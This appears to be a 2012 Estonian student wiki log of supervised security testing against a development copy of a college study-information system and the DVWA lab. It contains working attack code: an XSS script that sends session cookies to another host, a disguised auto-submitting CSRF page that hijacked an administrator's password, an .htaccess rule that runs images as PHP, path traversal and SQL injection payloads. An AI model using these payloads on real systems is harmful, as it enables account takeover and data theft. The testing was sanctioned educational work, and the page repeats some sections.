Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:50:59Z

Ulihten: /* Alo tegevus */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm

http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting

http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting

http://www.youtube.com/watch?v=SG1cvGQ971g

http://www.isecom.org/research.html

http://evuln.com/tools/

http://sectools.org/tag/web-scanners/

http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/

http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
